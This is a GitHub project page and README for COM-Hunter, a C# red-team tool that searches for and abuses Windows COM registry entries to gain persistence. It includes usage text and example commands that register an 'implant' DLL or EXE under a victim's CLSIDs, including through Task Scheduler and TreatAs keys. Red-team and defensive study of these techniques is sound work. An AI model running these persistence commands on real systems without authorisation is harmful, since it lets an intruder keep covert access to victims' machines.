https://github.com/nickvourd/com-hunter

COM Hijacking VOODOO
https://github.com/nickvourd/com-hunter

clsid com com-object comhijacking csharp inprocserver32 localserver32 microsoft pentest pentest-tool persistence redteam redteam-tools redteaming taskscheduler windows

Last synced: 18 days ago
JSON representation

COM Hijacking VOODOO

• Host: GitHub
• URL: https://github.com/nickvourd/com-hunter
• Owner: nickvourd
• License: mit
• Created: 2022-05-26T19:34:59.000Z (almost 3 years ago)
• Default Branch: main
• Last Pushed: 2025-03-11T04:49:55.000Z (about 2 months ago)
• Last Synced: 2025-04-12T14:57:51.844Z (18 days ago)
• Topics: clsid, com, com-object, comhijacking, csharp, inprocserver32, localserver32, microsoft, pentest, pentest-tool, persistence, redteam, redteam-tools, redteaming, taskscheduler, windows
• Language: C#
• Homepage:
• Size: 468 KB
• Stars: 288
• Watchers: 3
• Forks: 48
• Open Issues: 0
• Metadata Files:
  • Readme: README.md
  • License: LICENSE

Awesome Lists containing this project

README

        
# COM-Hunter

COM Hijacking VOODOO



  



  

  


  

  

  



## Description

COM-Hunter is a COM Hijacking persistnce tool written in C#.

![Static Badge](https://img.shields.io/badge/.NET-4.8-blue?style=flat&logoSize=auto)

![Static Badge](https://img.shields.io/badge/Version-2.0%20-red?link=https%3A%2F%2Fgithub.com%2Fnickvourd%2FCOM-Hunter%2Freleases)

The following list explains the available modes:

- **Search Mode**: Searches for CLSIDs based on `LocalServer32`, `InprocServer32`, and registry hives `HKLM` and `HKCU`.

- **Classic Persist Mode**: Performs classic COM hijacking persistence using `LocalServer32` or `InprocServer32`.

- **Task Scheduler Mode**: Automatically establishes COM hijacking persistence via Task Scheduler using `LocalServer32` or `InprocServer32`.

- **TreatAs Mode**: Performs COM hijacking persistence via the TreatAs registry key and a fake (forwardable) CLSID using `LocalServer32` or `InprocServer32`.

> If you find any bugs, don’t hesitate to [report them](https://github.com/nickvourd/COM-Hunter/issues). Your feedback is valuable in improving the quality of this project!

## Disclaimer

The authors and contributors of this project are not liable for any illegal use of the tool. It is intended for educational purposes only. Users are responsible for ensuring lawful usage.

## Table of Contents

- [COM-Hunter](#com-hunter)

    - [Description](#description)

    - [Disclaimer](#disclaimer)

    - [Table of Contents](#table-of-contents)

    - [Acknowledgement](#acknowledgement)

    - [Usage](#usage)

    - [Examples](#examples)

    - [References](#references)

## Acknowledgement

 

This project created with :heart: by [@nickvourd](https://x.com/nickvourd) && [@S1ckB0y1337](https://x.com/S1ckB0y1337).

Special thanks to my friend [Marios Gyftos](https://www.linkedin.com/in/marios-gyftos-a6b62122/) for his invaluable assistance during the beta testing phase of this tool.

Inspired by the [RTO course](https://courses.zeropointsecurity.co.uk/courses/red-team-ops) from [@zeropointsecltd](https://x.com/zeropointsecltd).

## Usage

```

 ██████╗ ██████╗ ███╗   ███╗      ██╗  ██╗██╗   ██╗███╗   ██╗████████╗███████╗██████╗

██╔════╝██╔═══██╗████╗ ████║      ██║  ██║██║   ██║████╗  ██║╚══██╔══╝██╔════╝██╔══██╗

██║     ██║   ██║██╔████╔██║█████╗███████║██║   ██║██╔██╗ ██║   ██║   █████╗  ██████╔╝

██║     ██║   ██║██║╚██╔╝██║╚════╝██╔══██║██║   ██║██║╚██╗██║   ██║   ██╔══╝  ██╔══██╗

╚██████╗╚██████╔╝██║ ╚═╝ ██║      ██║  ██║╚██████╔╝██║ ╚████║   ██║   ███████╗██║  ██║

 ╚═════╝ ╚═════╝ ╚═╝     ╚═╝      ╚═╝  ╚═╝ ╚═════╝ ╚═╝  ╚═══╝   ╚═╝   ╚══════╝╚═╝  ╚═╝

                                   Version: 2.0

                             @nickvourd && @S1ckB0y1337

                  ~ Inspired during the RTO course by @zeropointsecltd ~

Usage: COM-Hunter.exe  

[+] Available Modes:

    search             Search Mode

    persist            Classic Persist Mode

    tasksch            Task Scheduler Mode

    treatas            TreatAs Mode

[+] Search Mode:

Usage:  COM-Hunter.exe search  

    -a, --all                   Search DLL and EXE implementations in HKLM and HKCU

    -i, --inprocserver32        Search DLL implementations in HKLM and HKCU

    -l, --localserver32         Search EXE implementations in HKLM and HKCU

    -m, --machine               Search DLL and EXE implementations in HKLM

    -u, --user                  Search DLL and EXE implementations in HKCU

[+] Classic Persist Mode:

Usage:  COM-Hunter.exe persist   

    -i, --inprocserver32        Set DLL implementation

    -l, --localserver32         Set EXE implementation

[+] Task Scheduler Mode:

Usage:  COM-Hunter.exe tasksch  

    -i, --inprocserver32        Set DLL implementation

    -l, --localserver32         Set EXE implementation

[+] TreatAs Mode:

Usage:  COM-Hunter.exe treatas    

    -i, --inprocserver32        Set DLL implementation

    -l, --localserver32         Set EXE implementation

```

## Examples

:information_source: Search DLL and EXE implementations in HKLM and HKCU:

```

.\COM-Hunter.exe search 01575CFE-9A55-4003-A5E1-F38D1EBDCBE1 -a

```

:information_source: Search EXE implementations in HKLM and HKCU:

```

.\COM-Hunter.exe search "{01575CFE-9A55-4003-A5E1-F38D1EBDCBE1}" -l

```

:information_source: Advanced search EXE implementations in HKLM:

```

.\COM-Hunter.exe search "{01575CFE-9A55-4003-A5E1-F38D1EBDCBE1}" -l --machine

```

:information_source: Search EXE and DLL implementations in HKCU:

```

.\COM-Hunter.exe search AB8902B4-09CA-4bb6-B78D-A8F59079A8D5 --user

```

:information_source: Perform classic persistence using DLL implementation:

```

.\COM-Hunter.exe persist AB8902B4-09CA-4bb6-B78D-A8F59079A8D5 C:\Users\victim\Desktop\implant.dll -i

```

:information_source: Perform classic persistence using EXE implementation:

```

.\COM-Hunter.exe persist "{AB8902B4-09CA-4bb6-B78D-A8F59079A8D5}" C:\Users\victim\Desktop\implant.exe --localserver32

```

:information_source: Perform persistence via Task Scheduler using DLL implementation:

```

.\COM-Hunter.exe tasksch C:\Users\victim\Desktop\implant.dll --inprocserver32

```

:information_source: Perform persistence via the TreatAs registry key and a fake (forwardable) CLSID using DLL implementation:

```

.\COM-Hunter.exe treatas AB8902B4-09CA-4bb6-B78D-A8F59079A8D5 "{00000012-1312-1997-2605-F38D1EBDCBE1}" C:\Users\victim\Desktop\implant.dll -i

```

## References

- [Persistence: “the continued or prolonged existence of something”: Part 2 – COM Hijacking by MDSec](https://www.mdsec.co.uk/2019/05/persistence-the-continued-or-prolonged-existence-of-something-part-2-com-hijacking/)

- [Abusing the COM Registry Structure (Part 2): Hijacking & Loading Techniques by BOHOPS](https://bohops.com/2018/08/18/abusing-the-com-registry-structure-part-2-loading-techniques-for-evasion-and-persistence/)

- [Userland Persistence with Scheduled Tasks and COM Handler Hijacking by Enigma0x3](https://enigma0x3.net/2016/05/25/userland-persistence-with-scheduled-tasks-and-com-handler-hijacking/)

- [COM Objects Hijacking by Virus Total](https://blog.virustotal.com/2024/03/com-objects-hijacking.html)